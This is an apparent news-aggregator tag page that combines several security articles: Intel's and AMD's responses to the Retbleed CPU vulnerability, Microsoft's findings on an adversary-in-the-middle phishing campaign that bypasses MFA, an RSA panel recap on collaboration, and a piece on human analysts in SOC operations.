Intel and AMD Respond

Both Intel and AMD have responded with advisories. Intel has confirmed that the vulnerability exists on Skylake-generation processors that don’t have a protection known as enhanced Indirect Branch Restricted Speculation (eIBRS) in place.

“Intel has worked with the Linux community and VMM vendors to provide customers with software mitigation guidance which should be available on or around today's public disclosure date,” Intel wrote in a blog post. “Note that Windows systems are not affected given that these systems use Indirect Branch Restricted Speculation (IBRS) by default which is also the mitigation being made available to Linux users. Intel is not aware of this issue being exploited outside of a controlled lab environment.”

AMD, meanwhile, has also published guidance. “As part of its ongoing work to identify and respond to new potential security vulnerabilities, AMD is recommending software suppliers consider taking additional steps to help guard against Spectre-like attacks,” a spokesman wrote in an email. The company has also published a white paper.

Both the researchers’ research paper and blog post explain the microarchitectural conditions necessary to exploit Retbleed:

_**Intel**. On Intel, returns start behaving like indirect jumps when the Return Stack Buffer, which holds return target predictions, is underflowed. This happens upon executing deep call stacks. In our evaluation we found over a thousand of such conditions that can be triggered by a system call. The indirect branch target predictor for Intel CPUs has been studied in_ _previous work__._

_**AMD**. On AMD, returns will behave like an indirect branch regardless of the state of their Return Address Stack. In fact, by poisoning the return instruction using an indirect jump, the AMD branch predictor will assume that it will encounter an indirect jump instead of a return and consequentially predict an indirect branch target. This means that any return that we can reach through a system call can be exploited—and there are tons of them._

In an email, Razavi added: “Retbleed is more than just a retpoline bypass on Intel, specially on AMD machines. AMD is in fact going to release a white paper introducing Branch Type Confusion based on Retbleed. Essentially, Retbleed is making AMD CPUs confuse return instructions with indirect branches. This makes exploitation of returns very trivial on AMD CPUs.”

The mitigations will come at a cost that the researchers measured to be between 12 percent and 28 percent more computational overhead. Organizations that rely on affected CPUs should carefully read the publications from the researchers, Intel, and AMD, and be sure to follow the mitigation guidance.

_This story originally appeared on_ _Ars Technica__._

New ‘Retbleed’ Attack Can Swipe Key Data From Intel and AMD CPUs

The massive phishing campaign does not exploit a vulnerability in MFA. Instead, it spoofs an Office 365 authentication page to steal credentials.

Microsoft recently discovered a widespread phishing attack campaign targeting Office 365 users that lures victims to a phony Office authentication page where it pilfers their credentials and later executes a second wave of attack, business email compromise (BEC), using intel gathered from their email accounts.

The attackers behind the campaign have targeted more than 10,000 organizations since September 2021, according to Microsoft, and employ the Evilginx2 phishing kit as the infrastructure for hijacking the authentication process. "We also uncovered similarities in their post-breach activities, including sensitive data enumeration in the target’s mailbox and payment frauds," according to a post by the Microsoft 365 Defender Research Team that details the attacks.

The man-in-the-middle attack — or, as Microsoft now calls it, adversary-in-the-middle (AiTM) — sets up a proxy server that sits between the victim and the actual authentication page. "Such a setup allows the attacker to steal and intercept the target's password and the session cookie that proves their ongoing and authenticated session with the website. Note that this is not a vulnerability in MFA; since AiTM phishing steals the session cookie, the attacker gets authenticated to a session on the user’s behalf, regardless of the sign-in method the latter uses," Microsoft said in its post.

Organizations should up their MFA game with conditional access policies, which vet sign-in requests based on identity, IP location, and device status, for example, according to Microsoft.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Microsoft: 10,000 Orgs Targeted in Phishing Attack That Bypasses Multifactor Authentication

The morning of June 9th, I was driving over the Golden Gate Bridge into San Francisco with my family. While crossing the bridge my children shared some facts about this modern engineering marvel. Each day, approx. 100,000 vehicles travel over the bridge deck, which weighs a staggering 150,000 tons, and is suspended by 250 pairs …
  All Hands-on Deck: A Whole-of-Society Approach for Cybersecurity Read More »

The morning of June 9th, I was driving over the Golden Gate Bridge into San Francisco with my family. While crossing the bridge my children shared some facts about this modern engineering marvel. Each day, approx. 100,000 vehicles travel over the bridge deck, which weighs a staggering 150,000 tons, and is suspended by 250 pairs of steel ropes.

We noted that a single steel rope could not withstand such an enormous weight. But when hundreds work together in unison, their combined strengths are sufficient to support the monumental load of the bridge and its occupants, with capacity to absorb fluctuations in traffic volumes and high stress events like windstorms and earthquakes.

Like the steel ropes of the Golden Gate Bridge, we in the cybersecurity community cannot carry the load alone, but together “with all hands-on deck”, we can address even the largest challenges.

That afternoon at the RSA Conference 2022, I had the pleasure of moderating a panel with Microsoft’s Aanchal Gupta (@nchlgpt), Intel’s Tom Garrison (@tommgarrison) and the NSA’s (@NSAGov) Dr. Diane Janosek (@dm\_janosek) where we discussed how to overcome a culture of secrecy to create transparent and trusted cross-organization collaboration, and the challenge of encouraging responsible disclosure without the fear of backlash.

In this blog I will summarize the topics discussed by each of the panelists, starting with the **threats that are driving the need for greater collaboration.**

At the beginning of the discussion, Aanchal highlighted that **Software Supply Chain** attacks are both one of the industry’s biggest risks and therefore priorities to address saying “even though this is not a new risk, our reliance on third party and open-source software is exponentially increasing, and it is only a matter of time before we see more supply chain issues. Log4j and Nobelium are just the tip of the iceberg.”

Aanchal then explained that there are two primary reasons why supply chain attacks will continue to rise. “First, as our dependence on third party software is growing, it is becoming more attractive for threat actors to find the soft spots. Attackers could easily convince an insider, or they could find an unpatched vulnerability, to inject their malicious payload into the supply chain. What makes it extremely difficult is that certain software is ubiquitous, “like salt in your pantry”. Salt is in almost every snack item in your pantry, and you can imagine if that is contaminated, how difficult it will be to address the issue. Log4j became a challenging issue because of its pervasive use.”

Tom further elaborated on how the supply chain is evolving into a platform with a “digital DNA” and the importance of **System, Traceability** and **Transparency**. “What we want to do is to peel back this sort of _almost_ secrecy that’s existed around what components are used to build your device–whether it’s a PC or a server or an IOT device. These are the foundation of trust and empower customers to make intelligent decisions around their platforms. In order to maintain a healthy system, it is important to ask questions about **Patching**. How do I manage my system overtime? Am I smart about updates and applying them in a timely manner? Do I have a process around updating these machines on a regular basis? This is the very first step towards transparency and is a great healthy step.”

Diane then highlighted the strategic importance of also considering the threats associated with **Adversarial AI**. “While AI has phenomenal machine learning usages, helping make sense of the massive data sets – the entire inference depends upon the integrity of that data for the algorithms to _actually_ work. “If the adversaries are altering that data, recognizing that we’re using certain models for critical security decisions and more, our models will be incorrect”. Understanding the world of human generated attacks vs. the AI based attack surface raises the level of sophistication and complexity that we must get ahead of.”

Next, Aanchal discussed how organizations can foster collaboration to raise the bar for security, starting with the concept of a **Software Bill of Materials (SBOM)**. To get ahead of supply chain risks, it helps to think of your SBOM as a “recipe”.

1.  First, **know what ingredients make up your recipe**. Do you have a list of all the software in your organization? If not, you need to create one.
2.  Next, **understand where your ingredients come from** and what controls are in place to ensure their reliability as they are produced and delivered to you.
3.  And finally, trust but verify. **Test your ingredients regularly to ensure their integrity.**

To mitigate some of this risk, the US Government issued an Executive Order (EO) earlier this year. The EO is the start of the process of the US government identifying the problems and engaging with the private sector to define solutions. This is a multi-year effort that will profoundly change the requirements to sell software to the US government, one of the largest tech buyers on the planet. As we help shape the EO, we will raise the difficulty of attacking the US government, and overall software.  

As the largest provider of enterprise software, we have a responsibility to provide leadership and help – with things like the SBOM – where you call out the dependencies that each piece of software has. We are actively participating in helping shape the underpinnings of the EO. 

Tom then discussed the importance of collaborating with both external AND internal researchers. “To build a deep understanding of the products and HW/SW solutions stacks, this requires partnerships with ethical hackers, and security investments to drive deeper research to ensure that the learnings not only fix legacy and historical problems, but also ensure long-term safety as we shape future products and technologies.”

The panel then moved onto discussing the paradoxical need for transparency and responsible disclosure within a culture of secrecy. This was talked about with great energy and passion, not just by the panelists but also by members of the audience. There is always the tension of how we maintain confidentiality about the vulnerability until all the partners have a mitigation or fix, but also ensure that stakeholders are well informed. This is not just about doing the right thing morally, but it is also good for business to share the information in a timely manner. We are at an inflection point; where this clarity and realization is helping drive intentional collaboration on vulnerability disclosure to patching as a priority and we look forward to making measurable progress here.

The panel agreed that we should not penalize and ostracize people for sharing a breach of their system. We need to shift the culture from blame to community support. When we support organizations to be forthcoming with their experience, we will get better insights and it will also help identify supply chain issues early on. It is due to the fear of retaliation that people don’t share the details. Help them become better vendors and service providers by sharing their knowledge. Their breach is not just their breach anymore; we are all in this together.

Finally, the conversation shifted to working with law enforcement to ensure cyber criminals are held accountable. Diane gave this wonderful example: “Consider critical infrastructure sectors for the United States (e.g., energy sector, transportation sector etc.). 80% are run by the private sector, and 20% by the government. So even if I, as the government, get an A grade for my 20% (which is defense and telecommunications), it’s not good enough for the country if all other sectors fail. We need to establish the fine balance to be able to do the signals intelligence mission and the cyber security mission across government and private sector, to get holistic protection, while protecting the Constitution”. This is a crucial point for a whole-of-society approach; we must continue to partner with all sectors – private and government – to ensure we preserve privacy and security, holistically.

Thinking back to the Golden Gate bridge, the individual steel hangers do not support just the vehicles directly beneath them. Each hanger is critical in supporting the entire bridge and every vehicle travelling on it, no matter where on the bridge a vehicle happens to be. Similarly, for those of us in the cybersecurity industry and our respective customers and products, when we work together, we create a stronger and more resilient foundation for all.

Watch the panel on demand at this link: https://cybersecurityinside.com/video/cybersecurity-rsa-panelists/

Listen to the panel on demand at this link: https://cybersecurityinside.com/episodes/protect-cyber-collaboration-rsa/

Read Tom Garrison’s ‘Supply Chain Security is Evolving into a Platform with “Digital DNA”’ blog at this link: https://buff.ly/3xEYb2A

All Hands-on Deck: A Whole-of-Society Approach for Cybersecurity

Security researchers have uncovered yet another vulnerability affecting numerous older AMD and Intel microprocessors that could bypass current defenses and result in Spectre-based speculative-execution attacks.
Dubbed Retbleed by ETH Zurich researchers Johannes Wikner and Kaveh Razavi, the issues are tracked as CVE-2022-29900 (AMD) and CVE-2022-29901 (Intel), with the chipmakers releasing

Security researchers have uncovered yet another vulnerability affecting numerous older AMD and Intel microprocessors that could bypass current defenses and result in Spectre-based speculative-execution attacks.

Dubbed **Retbleed** by ETH Zurich researchers Johannes Wikner and Kaveh Razavi, the issues are tracked as CVE-2022-29900 (AMD) and CVE-2022-29901 (Intel), with the chipmakers releasing software mitigations as part of a coordinated disclosure process.

Retbleed is also the latest addition to a class of Spectre attacks known as Spectre-BTI (CVE-2017-5715 or Spectre-V2), which exploit the side effects of an optimization technique called speculative execution by means of a timing side channel to trick a program into accessing arbitrary locations in its memory space and leak private information.

Speculative execution attempts to fill the instruction pipeline of a program by predicting which instruction will be executed next in order to gain a performance boost, while also undoing the results of the execution should the guess turn out to be wrong.

Attacks like Spectre take advantage of the fact that these erroneously executed instructions — a result of the misprediction — are bound to leave traces of the execution in the cache, resulting in a scenario where a rogue program can trick the processor into executing incorrect code paths and infer secret data pertaining to the victim.

Put differently, Spectre is an instance of transient execution attack, which relies on hardware design flaws to "influence" which instruction sequences are speculatively executed and leak encryption keys or passwords from within the victim's memory address space.

This, in turn, is achieved through microarchitectural side channels like Flush+Reload that measures the time taken to perform memory reads from the cache that's shared with the victim, but not before flushing some of the shared memory, resulting in either fast or slow reads depending on whether the victim accessed the monitored cache line since it was evicted.

While safeguards like Retpoline (aka "return trampoline") have been devised to prevent branch target injection (BTI), Retbleed is designed to get around this countermeasure and achieve speculative code execution.

"Retpolines work by replacing indirect jumps \[branches where the branch target is determined at runtime\] and calls with returns," the researchers explained.

"Retbleed aims to hijack a return instruction in the kernel to gain arbitrary speculative code execution in the kernel context. With sufficient control over registers and/or memory at the victim return instruction, the attacker can leak arbitrary kernel data."

The core idea, in a nutshell, is to treat return instructions as an attack vector for speculation execution and force the returns to be predicted like indirect branches, effectively undoing protections offered by Retpoline.

As a new line of defense, AMD has introduced what's referred to as Jmp2Ret, while Intel has recommended using enhanced Indirect Branch Restricted Speculation (eIBRS) to address the potential vulnerability even if Retpoline mitigations are in place.

"Windows operating system uses IBRS by default, so no update is required," Intel said in an advisory, noting it worked with the Linux community to make available software updates for the shortcoming.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New 'Retbleed' Speculative Execution Attack Affects AMD and Intel CPUs

Machine learning and automation can help free up security pros for higher-value tasks.

Humans have a well-deserved reputation for being the weakest link in the cybersecurity of any size organization. Whether it's an IT specialist misconfiguring a firewall setting, a DevOps engineer failing to secure a cloud storage bucket, or a hapless business user falling for a phishing scam, the vast majority of cybersecurity breaches are primarily caused by human error creating exploitable vulnerabilities. The result is many avoidable weaknesses being pursued by criminal opportunists enabled by cheap, plentiful cybercrime tools of the trade.

Thankfully, the humans working in the security operations center (SOC), the Tier 1 and Tier 2 analysts on the front line of cyber defense, are the strongest link in cybersecurity operations. They must be kept in the loop, ideally performing higher-value tasks than keeping "eyes on the glass" to review security telemetry.

**Tools for Assisting, Not Replacing, Humans  
**

Looking to technology to help us secure technology is the right approach. The servers, Web applications, endpoints, network devices, and security measures in a company's digital landscape produce massive volumes of security telemetry and alerts that must be monitored and analyzed, but most turn out to be benign.

Identifying the meaningful alerts in high-volume event streams is the perfect job for correlation rules and unsupervised machine learning (ML) algorithms that combine human knowledge and threat intelligence with continuous learning and improvement. Machines can handle the speed and scale required for the initial screening of the high-volume stream of event logs and alerts. Also, algorithms don't get tired or have a lapse in attention, go on vacation, or call in sick.

Automating this facet of SOC operations allows these AI-based tools to do the tedious work of sifting out false positives and correlating and surfacing real alerts in real time. Automation can also go a step further, applying rules in playbooks to enrich alerts with context (which machine or user, what happened, when), contain suspicious activity in the network, and trigger an automatic response in well-defined use cases.

The result can be minimizing the volume of alerts by a factor of 10 or more, from 10,000 a day to 1,000 or less. This noise reduction saves up to 50% of expert SOC labor, dramatically increasing SOC efficiency and effectiveness.

**Humans Are the Ones Who Catch the Cybercriminals in Action  
**

This type of automation frees expert human analysts to use their experience, skills, intuition, and problem solving in the hunt for cybercriminals active in your environment. The automation feeds junior SOC analysts who triage the findings by applying human intelligence to recognizing patterns, evaluating anomalies, eliminating false positives, and identifying alerts that need further human assessment.

For example, John in HR typically accesses two databases during regular business hours. An alert comes through that John has accessed a third database on a Saturday. Only a human can determine if this new behavior is anomalous but nonthreatening. After the SOC analyst notifies the IT department about the unexpected database activity, IT confirms that John has been granted temporary access to the additional data, which is HR-related.

After triage by junior SOC analysts, high-priority alerts are forwarded to SOC senior analysts. These skilled security specialists are charged with investigating the alerts and identifying where an attack is coming from, the cybercrime groups behind the attack, methods they are using, lateral movement observed, and the dwell time of attackers. SOC experts also propose strategies for mitigation and eradication.

Humans are most essential when identifying attacks that cut across different systems, applications, and access methods. It was skilled humans who uncovered new activity on the part of Hafnium. The nation-state cybercriminals had been exploiting vulnerabilities in Microsoft Exchange servers to steal emails, compromise networks, and move laterally in affected organizations. These incursions took place for three months prior to discoveries credited by Microsoft to researchers at security firms Volexity and Dubex.

**Key Takeaways  
**

Organizations of any size, but particularly midsize and larger enterprises, can benefit from having their SOCs use artificial intelligence, unsupervised ML, and automation to remove the burden of first-level event log screening from junior analysts and provide intelligence that senior analysts can use in investigations. Such automation is necessary to handle the ever-increasing volume, velocity, and variety of security telemetry. It cannot, however, eliminate the need for the expert human analyst.

SOC analysts need not be concerned about job security in the face of ML and automation. Rather, they should welcome the improved productivity and freedom automation provides to use their intelligence and creativity for higher-value activities such as research, threat analysis, remediation, and threat hunting.

Keep Humans in the Loop in SOC Operations

Attackers used adversary-in-the-middle attacks to steal passwords, hijack sign-in sessions and skip authentication and then use victim mailboxes to launch BEC attacks against other targets.

Attackers used adversary-in-the-middle attacks to steal passwords, hijack sign-in sessions and skip authentication and then use victim mailboxes to launch BEC attacks against other targets.

Microsoft researchers have uncovered a massive phishing campaign that can steal credentials even if a user has multi-factor authentication (MFA) enabled and has so far attempted to compromise more than 10,000 organizations.

The campaign, which has been active since September 2021, depends upon the use of adversary-in-the-middle (AiTM) phishing sites in the initial attacks to hijack session cookies and steal credentials. From there, attackers can access victims’ user mailboxes to launch further attacks against other targets, the Microsoft 365 Defender Research Team from the Microsoft Threat Intelligence Center (MTIC) wrote in a blog post published Tuesday.

In AiTM attacks, a threat actor deploys a proxy server between a target user and the website the user wishes to visit–that is, the site the attacker wishes to impersonate, researchers explained.

“Such a setup allows the attacker to steal and intercept the target’s password and the session cookie that proves their ongoing and authenticated session with the website,” they wrote.

It’s important to point out that this type of attack does not denote a vulnerability in the type of MFA employed by a corporate email system, they added. AiTM phishing steals the session cookie, so the attacker gets authenticated to a session on the user’s behalf regardless of the sign-in method the latter uses, researchers said.

Indeed, attackers are getting wise to organizations’ increasing use of MFA to better secure user accounts and creating more sophisticated phishing attacks like these that can bypass it, noted a security professional.

“While MFA is certainly valuable and should be used when possible, by capturing the password and session cookie–and because the session cookie shows that MFA was already used to login–the attackers can often circumvent the need for MFA when they login to the account again later using the stolen password,” observed Erich Kron, security awareness advocate at security awareness training firm KnowBe4, in an email to Threatpost.

****AiTM Phishing, Unpacked****

In their observation of the campaign, Microsoft researchers took a deeper dive into how these types of attacks work and how they can be used to mount secondary business email compromise (BEC) attacks once initial access to someone’s account is gained, they said.

AiTM phishing attacks depend upon the session that every modern web service implements with a user after successful authentication so that the user doesn’t have to be authenticated at every new page they visit, researchers explained.

“This session functionality is implemented through a session cookie provided by an authentication service after initial authentication,” they wrote. “The session cookie is proof for the web server that the user has been authenticated and has an ongoing session on the website.”

In AiTM phishing, an attacker attempts to steal a target user’s session cookie so they can skip the whole authentication process and act as if they are the legitimate authenticated user, researchers said.

“To do this, the attacker deploys a webserver that proxies HTTP packets from the user that visits the phishing site to the target server the attacker wishes to impersonate and the other way around,” they wrote. “This way, the phishing site is visually identical to the original website (as every HTTP is proxied to and from the original website).”

This attack is especially convenient for threat actors because it precludes the need for them to craft their own phishing sites such as the ones used in conventional phishing campaigns, researchers noted.

****Specific Attack Vector****

In the phishing campaign observed by Microsoft researchers, attackers initiate contact with potential victims by sending emails with an HTML file attachment to multiple recipients in different organizations. The messages claim that the recipients have a voicemail message and need to click on the attachment to access it or it will be deleted in 24 hours.

If a user clicks on the link, they are redirected to a site that tells them they will be redirected again to their mailbox with the audio in an hour. Meanwhile, they are asked to sign in with their credentials.

At this point, however, the attack does something unique using clever coding by automatically filling in the phishing landing page with the user’s email address, “thus enhancing its social engineering lure,” researchers noted.

If a target enters his or her credentials and gets authenticated, he or she is redirected to the legitimate Microsoft office.com page. However, in the background, the attacker intercepts the credentials and gets authenticated on the user’s behalf, providing free reign to perform follow-on activities, researchers said.

In the phishing email chain that researchers observed, the threat actor used the authentication to commit payment fraud in secondary attacks from within the organization, researchers said.

****Follow-Up BEC and Payment Fraud****

Attackers took less than five minutes after hijacking sessions and stealing credentials to begin the process of conducting payment fraud by authenticating to Outlook to access finance-related emails and file attachments, researchers said. The following day, they accessed these emails and files every few hours to search for opportunities to commit fraud.

The threat actor also deleted from the compromised account’s Inbox folder the original phishing email they sent to hide traces of their initial access, researchers added.

“These activities suggest the attacker attempted to commit payment fraud manually,” they wrote.

Attackers also used Outlook Web Access (OWA) on a Chrome browser to commit payment fraud while using the compromised account’s stolen session cookie, researchers added.

Tag

#intel